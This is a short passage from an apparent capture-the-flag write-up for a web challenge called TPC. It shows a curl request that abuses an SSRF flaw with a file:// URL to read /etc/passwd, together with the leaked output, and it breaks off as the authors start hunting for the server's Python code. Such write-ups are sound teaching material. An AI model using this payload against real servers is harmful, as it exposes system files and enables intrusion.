TPC (web, 310p, 33 solves) Description The challenge implements a simple python application taking an URL as parameter. It allows us to perform SSRF and local file disclosure.
Reading a file on the server is as simple as:
$ curl -s --output - 'http://220.127.116.11:8000/query?site=file:///etc/passwd' root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin [...] We first needed to be sure what the python code does. To find this out, we tried to find where it was located: